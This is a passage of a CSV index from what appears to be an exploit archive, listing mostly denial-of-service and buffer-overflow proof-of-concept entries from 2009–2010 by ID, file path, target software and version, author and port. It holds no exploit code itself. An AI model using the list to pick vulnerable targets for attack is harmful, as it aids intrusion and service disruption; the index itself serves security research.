'.m3u' Local Buffer Overflow (PoC)",2009-08-07,"opt!x hacker",dos,windows, +9393,exploits/windows/dos/9393.pl,"FoxPlayer 1.1.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-07,"opt!x hacker",dos,windows, +9401,exploits/windows/dos/9401.py,"SpiceWorks 3.6 - 'Accept' Overflow Crash",2009-08-07,"David Kennedy (ReL1K)",dos,windows, +9411,exploits/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow (PoC)",2009-08-11,"fl0 fl0w",dos,windows, +9417,exploits/windows/dos/9417.txt,"Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash",2009-08-11,webDEViL,dos,windows, +9423,exploits/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash",2009-08-12,murderkey,dos,windows, +9427,exploits/windows/dos/9427.py,"VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)",2009-08-13,Dr_IDE,dos,windows, +9429,exploits/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflows (PoC)",2009-08-13,Dr_IDE,dos,windows, +9442,exploits/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",dos,linux, +9446,exploits/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH)",2009-08-18,"fl0 fl0w",dos,windows, +9449,exploits/windows/dos/9449.txt,"TheGreenBow VPN Client - 'tgbvpn.sys' Local Denial of Service",2009-08-18,Evilcry,dos,windows, +9454,exploits/multiple/dos/9454.txt,"Apple Safari 4.0.2 - WebKit Parsing of Floating Point Numbers Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",dos,multiple, +9455,exploits/windows/dos/9455.html,"Microsoft Internet Explorer - JavaScript SetAttribute Remote Crash",2009-08-18,"Irfan Asrar",dos,windows, +9457,exploits/windows/dos/9457.pl,"broid 1.0 Beta 3a - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,hack4love,dos,windows, +9467,exploits/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,dos,windows, +9478,exploits/windows/dos/9478.pl,"BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service",2007-06-21,Prili,dos,windows,80 +9480,exploits/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - 'fix.dll 1.0.0.1' Buffer Overflow (PoC)",2007-05-09,rgod,dos,windows, +9487,exploits/windows/dos/9487.pl,"Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-24,hack4love,dos,windows, +9496,exploits/windows/dos/9496.txt,"War-FTPD 1.65 - MKD/CD Requests Denial of Service",2009-08-24,"opt!x hacker",dos,windows, +9506,exploits/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 - '.fft' Crash (PoC)",2009-08-24,the_Edit0r,dos,windows, +9507,exploits/windows/dos/9507.pl,"AiO (All into One) Flash Mixer 3 - '.afp' Crash (PoC)",2009-08-24,the_Edit0r,dos,windows, +9514,exploits/hardware/dos/9514.py,"Xerox WorkCentre (Multiple Models) - Denial of Service",2009-08-25,"Henri Lindberg",dos,hardware, +9515,exploits/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - 'ALLO' Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",dos,windows, +9516,exploits/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",dos,windows, +9517,exploits/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",dos,windows, +9528,exploits/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 - Remote Denial of Service",2009-08-26,"ThE g0bL!N",dos,windows, +9537,exploits/windows/dos/9537.html,"Kaspersky 2010 - Remote Memory Corruption / Denial of Service (PoC)",2009-08-28,"Prakhar Prasad",dos,windows, +9539,exploits/windows/dos/9539.py,"uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,dos,windows, +9546,exploits/windows/dos/9546.pl,"Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)",2009-08-31,hack4love,dos,windows, +9547,exploits/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service",2009-08-31,"Gaurav Baruah",dos,windows, +9549,exploits/windows/dos/9549.c,"MailEnable 1.52 - HTTP Mail Service Stack Buffer Overflow (PoC)",2009-08-31,"fl0 fl0w",dos,windows, +9554,exploits/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - MobileSafari Crash + Reboot (Denial of Service)",2009-08-31,TheLeader,dos,windows, +9561,exploits/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,dos,windows, +9573,exploits/windows/dos/9573.pl,"dTunes 2.72 - Filename Processing Local Format String (PoC)",2009-09-01,TheLeader,dos,windows, +9584,exploits/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1)",2009-09-03,"expose 0day",dos,windows, +9585,exploits/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (2)",2009-09-03,"expose 0day",dos,windows, +9587,exploits/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service",2009-09-04,kingcope,dos,windows, +9594,exploits/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",dos,windows, +9597,exploits/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,dos,windows, +9606,exploits/win_x86/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service",2009-09-09,"Jeremy Brown",dos,win_x86, +9607,exploits/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",dos,windows, +9617,exploits/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",dos,windows, +9620,exploits/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,dos,windows, +9621,exploits/windows/dos/9621.txt,"Kolibri+ Web Server 2 - GET Denial of Service",2009-09-10,"Usman Saeed",dos,windows, +9622,exploits/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - LIST command Format String Denial of Service",2009-09-10,corelanc0d3r,dos,windows, +9626,exploits/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - '.mid' Integer Overflow (PoC)",2009-09-10,Dr_IDE,dos,windows, +9642,exploits/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",dos,multiple,1812 +9646,exploits/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service)",2009-09-11,crashbrz,dos,hardware, +9657,exploits/windows/dos/9657.pl,"httpdx 1.4 - HTTP Server Host Header Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",dos,windows, +9664,exploits/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,dos,windows, +9666,exploits/hardware/dos/9666.php,"Apple Safari IPhone - using tel: Remote Crash",2009-09-14,cloud,dos,hardware, +9667,exploits/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",dos,windows, +9668,exploits/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - '.jpg' Local Crash (PoC)",2009-09-14,the_Edit0r,dos,windows, +9670,exploits/windows/dos/9670.txt,"FotoTagger 2.12.0.0 - '.XML' Buffer Overflow (PoC)",2009-09-14,the_Edit0r,dos,windows, +9671,exploits/windows/dos/9671.py,"Tuniac 090517c - '.pls' Local Crash (PoC)",2009-09-14,zAx,dos,windows, +9672,exploits/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow (PoC)",2009-09-14,Dr_IDE,dos,windows, +9677,exploits/windows/dos/9677.c,"HERO SUPER PLAYER 3000 - '.m3u' Buffer Overflow (PoC)",2009-09-15,"fl0 fl0w",dos,windows, +9682,exploits/windows/dos/9682.txt,"Adobe Shockwave Player 11.5.1.601 - ActiveX Buffer Overflow (PoC)",2009-09-15,"Francis Provencher",dos,windows, +9683,exploits/windows/dos/9683.txt,"Novell Groupwise Client 7.0.3.1294 - ActiveX Denial of Service (PoC)",2009-09-15,"Francis Provencher",dos,windows, +9684,exploits/windows/dos/9684.txt,"EasyMail Quicksoft 6.0.2.0 - ActiveX Remote Code Execution (PoC)",2009-09-15,"Francis Provencher",dos,windows, +9685,exploits/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",dos,windows, +9686,exploits/windows/dos/9686.py,"VideoLAN VLC Media Player < 0.9.6 - 'CUE' Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,dos,windows, +9689,exploits/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,dos,windows, +9691,exploits/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,dos,windows, +9695,exploits/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - '.zip' Local Buffer Overflow (PoC)",2009-09-16,Dr_IDE,dos,windows, +9701,exploits/windows/dos/9701.c,"Notepad++ 5.4.5 - '.C' / '.CPP' Local Stack Buffer Overflow (PoC)",2009-09-16,"fl0 fl0w",dos,windows, +9707,exploits/windows/dos/9707.pl,"Ease Audio Cutter 1.20 - '.wav' Local Crash (PoC)",2009-09-17,zAx,dos,windows, +9717,exploits/windows/dos/9717.txt,"Xerver HTTP Server 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,dos,windows, +9731,exploits/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",dos,multiple, +9734,exploits/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)",2009-09-21,Dr_IDE,dos,windows, +9804,exploits/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 - Denial of Service (Metasploit)",2009-11-10,zhangmc,dos,windows,21 +9806,exploits/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation (PoC)",2009-09-29,pyrokinesis,dos,windows, +9811,exploits/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - Denial of Service",2009-09-28,Dr_IDE,dos,windows,21 +9814,exploits/windows/dos/9814.py,"CDBurnerXP 4.2.4.1351 - Local Crash (Denial of Service)",2009-09-25,Dr_IDE,dos,windows, +9815,exploits/windows/dos/9815.py,"Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,dos,windows, +9817,exploits/windows/dos/9817.py,"CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,dos,windows, +9823,exploits/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",dos,solaris, +9845,exploits/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,dos,osx, +9852,exploits/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,dos,windows,21 +9871,exploits/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service",2009-10-27,Dr_IDE,dos,windows, +9874,exploits/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",dos,windows, +9879,exploits/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,dos,windows,7144 +9881,exploits/windows/dos/9881.txt,"Eureka Email Client 2.2q - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",dos,windows,110 +9901,exploits/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - Denial of Service (PoC)",2009-10-23,"Zeus Penguin",dos,linux,80 +9956,exploits/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - Denial of Service",2009-10-14,"Townsend Harris",dos,hardware, +9969,exploits/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 Denial of Service",2009-10-23,"laurent gaffie",dos,multiple, +9971,exploits/windows/dos/9971.php,"Spider Solitaire - Denial of Service (PoC)",2009-10-15,SirGod,dos,windows, +9980,exploits/hardware/dos/9980.txt,"Websense Email Security - Denial of Service",2009-10-20,"Nikolas Sotiriu",dos,hardware, +9987,exploits/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial of Service",2009-10-14,"Tomer Bitton",dos,multiple,5060 +9999,exploits/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",dos,windows,21 +10004,exploits/multiple/dos/10004.txt,"Dopewars Server 1.5.12 - Denial of Service",2009-10-06,"Doug Prostko",dos,multiple,7902 +10005,exploits/windows/dos/10005.py,"Microsoft Windows 7/2008 R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",dos,windows,445 +10017,exploits/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",dos,linux, +10022,exploits/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",dos,linux, +10062,exploits/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,dos,windows,389 +10068,exploits/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",dos,windows, +10073,exploits/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,dos,windows,21 +10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",dos,multiple,389 +33476,exploits/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Multiple Vulnerabilities",2010-01-07,anonymous,dos,hardware, +10091,exploits/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",dos,windows,515 +10092,exploits/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,dos,windows, +10100,exploits/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,dos,windows,21 +10102,exploits/win_x86/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)",2009-11-16,"Jeremy Brown",dos,win_x86,80 +10103,exploits/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",dos,windows, +10104,exploits/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service",2009-11-13,zhangmc,dos,windows,21 +10106,exploits/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - 'aswMon2.sys' Kernel Memory Corruption",2009-11-17,Giuseppe,dos,windows, +10160,exploits/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",dos,windows,21 +10163,exploits/windows/dos/10163.pl,"Novell eDirectory - HTTPSTK Login Stack Overflow",2009-11-17,karak0rsan,dos,windows,80 +10164,exploits/windows/dos/10164.c,"Kaspersky AV 2010 9.0.0.463 - Local Denial of Service",2009-09-29,Heurs,dos,windows, +10171,exploits/windows/dos/10171.py,"Baby Web Server 2.7.2 - found Denial of Service",2009-11-18,"Asheesh kumar Mani Tripathi",dos,windows,80 +10176,exploits/windows/dos/10176.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code",2009-11-17,"Core Security",dos,windows, +10182,exploits/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,dos,hardware, +10184,exploits/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz & sp3x",dos,linux, +10185,exploits/bsd/dos/10185.txt,"SeaMonkey 1.1.8 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz & sp3x",dos,bsd, +10186,exploits/bsd/dos/10186.txt,"K-Meleon 1.5.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz & sp3x",dos,bsd, +10187,exploits/bsd/dos/10187.txt,"Opera 10.01 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz & sp3x",dos,bsd, +10190,exploits/windows/dos/10190.txt,"Cisco VPN Client - Integer Overflow Denial of Service",2009-11-21,"Alex Hernandez",dos,windows, +10202,exploits/linux/dos/10202.c,"Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service",2009-10-15,"Simon Vallet",dos,linux, +10203,exploits/linux/dos/10203.txt,"BibTeX - '.bib' File Handling Memory Corruption",2009-11-13,"Vincent Lafevre",dos,linux, +10204,exploits/windows/dos/10204.txt,"Foxit Reader - COM Objects Memory Corruption Remote Code Execution",2009-11-19,mrx,dos,windows, +10205,exploits/multiple/dos/10205.txt,"LibTIFF - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-11-12,wololo,dos,multiple, +10206,exploits/linux/dos/10206.txt,"Expat 2.0.1 - UTF-8 Character XML Parsing Remote Denial of Service",2009-11-12,"Peter Valchev",dos,linux, +10208,exploits/windows/dos/10208.txt,"Mozilla Firefox + Adobe - Memory Corruption (PoC)",2009-10-14,Skylined,dos,windows, +10210,exploits/windows/dos/10210.txt,"Microsoft Internet Explorer 6/7 - CSS Handling Denial of Service",2009-11-20,K4mr4n_st,dos,windows, +40301,exploits/php/dos/40301.php,"PHP 5.0.0 - 'domxml_open_file()' Local Denial of Service",2016-08-29,"Yakir Wizman",dos,php, +40302,exploits/php/dos/40302.php,"PHP 7.0 - Object Cloning Local Denial of Service",2016-08-29,"Yakir Wizman",dos,php, +40305,exploits/php/dos/40305.txt,"PHP 5.0.0 - 'simplexml_load_file()' Local Denial of Service",2016-08-29,"Yakir Wizman",dos,php, +10221,exploits/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,dos,windows,21 +10223,exploits/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,dos,windows,21 +10229,exploits/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",dos,multiple, +10237,exploits/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,dos,hardware,80 +10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,dos,php, +10243,exploits/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",dos,php, +10257,exploits/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",dos,windows,21 +10303,exploits/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",dos,windows, +10327,exploits/multiple/dos/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service",2009-04-01,"Red Hat",dos,multiple, +10333,exploits/windows/dos/10333.py,"VideoLAN VLC Media Player 1.0.3 - 'smb://' URI Handling Remote Stack Overflow (PoC)",2009-12-06,Dr_IDE,dos,windows, +10334,exploits/multiple/dos/10334.py,"VideoLAN VLC Media Player 1.0.3 (OSX/Linux) - RTSP Buffer Overflow (PoC)",2009-12-06,Dr_IDE,dos,multiple, +10338,exploits/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption (PoC)",2009-12-07,"Jeremy Brown",dos,linux, +10343,exploits/windows/dos/10343.txt,"Kingsoft Internet Security 9 - Denial of Service",2009-11-05,"Francis Provencher",dos,windows, +10349,exploits/linux/dos/10349.py,"CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow",2009-12-02,"Patroklos Argyroudis",dos,linux,80 +10352,exploits/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,dos,hardware, +10377,exploits/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code",2009-11-18,"Core Security",dos,windows,2315 +10469,exploits/linux/dos/10469.py,"Monkey HTTP Daemon < 0.9.3 - Denial of Service",2009-12-16,"Patroklos Argyroudis",dos,linux,80 +14034,exploits/windows/dos/14034.pl,"Wincalc 2 - '.num' Local Buffer Overflow (PoC)",2010-06-24,Madjix,dos,windows, +10489,exploits/windows/dos/10489.txt,"Google Picasa 3.5 - Local Buffer Overflow (Denial of Service)",2009-12-16,Connection,dos,windows, +40306,exploits/php/dos/40306.php,"PHP 5.0.0 - 'xmldocfile()' Local Denial of Service",2016-08-29,"Yakir Wizman",dos,php, +40307,exploits/multiple/dos/40307.txt,"Adobe Flash - Selection.setFocus Use-After-Free",2016-08-29,"Google Security Research",dos,multiple, +10553,exploits/hardware/dos/10553.rb,"3Com OfficeConnect Routers - Remote Denial of Service",2009-12-19,"Alberto Ortega Llamas",dos,hardware, +10580,exploits/hardware/dos/10580.rb,"3Com OfficeConnect Routers - 'Content-Type' Denial of Service",2009-12-21,"Alberto Ortega",dos,hardware, +10593,exploits/windows/dos/10593.txt,"Winamp 5.57 - Stack Overflow",2009-12-22,scriptjunkie,dos,windows, +10603,exploits/windows/dos/10603.c,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,dos,windows, +10617,exploits/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,dos,linux, +10634,exploits/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC)",2009-12-24,sandman,dos,linux, +10650,exploits/windows/dos/10650.pl,"jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)",2009-12-25,"D3V!L FUCKER",dos,windows, +10651,exploits/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 - '.asx' Buffer Overflow (PoC)",2009-12-25,"D3V!L FUCKER",dos,windows, +10820,exploits/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,dos,php,80 +10825,exploits/php/dos/10825.sh,"WordPress 2.9 - Denial of Service",2009-12-31,emgent,dos,php,80 +10826,exploits/php/dos/10826.sh,"Drupal 5.21/6.16 - Denial of Service",2009-12-31,emgent,dos,php,80 +10829,exploits/php/dos/10829.pl,"vBulletin - Denial of Service",2009-12-30,R3d-D3V!L,dos,php, +10840,exploits/windows/dos/10840.pl,"VideoLAN VLC Media Player 1.0.3 - '.asx' Denial of Service (PoC)",2009-12-31,"D3V!L FUCKER",dos,windows, +10842,exploits/windows/dos/10842.py,"SimplePlayer 0.2 - '.wav' Overflow Denial of Service",2009-12-31,mr_me,dos,windows, +10870,exploits/multiple/dos/10870.html,"Opera 10.10 - Status Bar Obfuscation",2009-12-31,"599eme Man",dos,multiple, +10879,exploits/windows/dos/10879.html,"Google Chrome 3.0195.38 - Status Bar Obfuscation",2009-12-31,"599eme Man",dos,windows, +10881,exploits/windows/dos/10881.pl,"Apollo Player 37.0.0.0 - '.aap' Buffer Overflow Denial of Service",2009-12-31,jacky,dos,windows, +10902,exploits/windows/dos/10902.pl,"Nero Express 7.9.6.4 - Local Heap (PoC)",2010-01-01,"D3V!L FUCKER",dos,windows, +10904,exploits/windows/dos/10904.pl,"Switch Sound File Converter - '.mpga' Buffer Overflow Denial of Service",2010-01-01,jacky,dos,windows, +10907,exploits/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial of Service (PoC)",2010-01-02,SarBoT511,dos,windows, +10908,exploits/windows/dos/10908.pl,"GOM player 2.1.9 - Local Crash (PoC)",2010-01-02,SarBoT511,dos,windows, +10909,exploits/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash (PoC)",2010-01-02,SarBoT511,dos,windows, +10947,exploits/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,dos,hardware, +10960,exploits/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,dos,multiple, +11009,exploits/multiple/dos/11009.pl,"Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",dos,multiple, +11020,exploits/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,dos,windows, +11021,exploits/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,dos,windows, +11034,exploits/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,dos,windows, +11043,exploits/hardware/dos/11043.txt,"Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC)",2010-01-06,Aodrulez,dos,hardware, +11044,exploits/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",dos,linux, +11052,exploits/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service (PoC)",2010-01-07,anonymous,dos,windows, +11053,exploits/windows/dos/11053.py,"ttplayer 5.6Beta3 - Denial of Service (PoC)",2010-01-07,"t-bag YDteam",dos,windows, +11062,exploits/windows/dos/11062.txt,"SopCast SopCore Control - ActiveX Remote Execution (PoC)",2010-01-08,superli,dos,windows, +11064,exploits/windows/dos/11064.txt,"UUSee ReliPlayer - ActiveX Remote Execution (PoC)",2010-01-08,superli,dos,windows, +11065,exploits/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Execution (PoC)",2010-01-08,superli,dos,windows, +11070,exploits/windows/dos/11070.txt,"Microsoft Windows Live Messenger 2009 - ActiveX Denial of Service",2010-01-08,"HACKATTACK IT SECURITY GmbH",dos,windows, +11084,exploits/windows/dos/11084.pl,"Real Player - Local Crash (PoC)",2010-01-10,"D3V!L FUCKER",dos,windows, +11095,exploits/windows/dos/11095.txt,"YPOPS! 0.9.7.3 - Buffer Overflow (SEH)",2010-01-10,blake,dos,windows, +11103,exploits/windows/dos/11103.html,"VideoLAN VLC Media Player 0.8.6i - ActiveX Denial of Service (PoC)",2010-01-10,"D3V!L FUCKER & germaya_x",dos,windows, +11106,exploits/multiple/dos/11106.bat,"Nuked KLan 1.7.7 & SP4 - Denial of Service",2010-01-11,"Hamza 'MIzoZ' N",dos,multiple, +11117,exploits/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote Denial of Service",2010-01-12,mr_me,dos,ios,8080 +11125,exploits/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow (Denial of Service) (PoC)",2010-01-13,"Julien Bedard",dos,hardware,2121 +11130,exploits/windows/dos/11130.pl,"Ofilter Player - 'skin.ini' Local Crash (PoC)",2010-01-13,"Rehan Ahmed",dos,windows, +11131,exploits/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,dos,windows, +11132,exploits/windows/dos/11132.pl,"Nemesis Player (NSP) - Local Denial of Service",2010-01-13,"Rehan Ahmed",dos,windows, +11133,exploits/windows/dos/11133.pl,"NPlayer - '.dat Skin' Local Heap Overflow (PoC)",2010-01-13,"Rehan Ahmed",dos,windows, +11142,exploits/multiple/dos/11142.txt,"Multiple Media Players ((iTunes / QuickTime) - HTTP DataHandler Overflow",2010-01-15,Dr_IDE,dos,multiple, +11145,exploits/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - Overwrite (SEH) (PoC)",2010-01-15,Darkb0x,dos,windows, +11149,exploits/windows/dos/11149.c,"Sub Station Alpha 4.08 - '.rt' Local Buffer Overflow (PoC)",2010-01-15,"fl0 fl0w",dos,windows, +11150,exploits/windows/dos/11150.txt,"Aqua Real 1.0/2.0 - Local Crash (PoC)",2010-01-15,R3d-D3V!L,dos,windows, +11165,exploits/windows/dos/11165.pl,"MediaMonkey 3.2.0 - Local Denial of Service",2010-01-17,Red-D3v1L,dos,windows, +11176,exploits/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)",2010-01-17,superli,dos,windows, +11180,exploits/windows/dos/11180.pl,"Muziic Player 2.0 - '.mp3' Local Denial of Service",2010-01-18,Red-D3v1L,dos,windows, +11182,exploits/windows/dos/11182.txt,"Microsoft 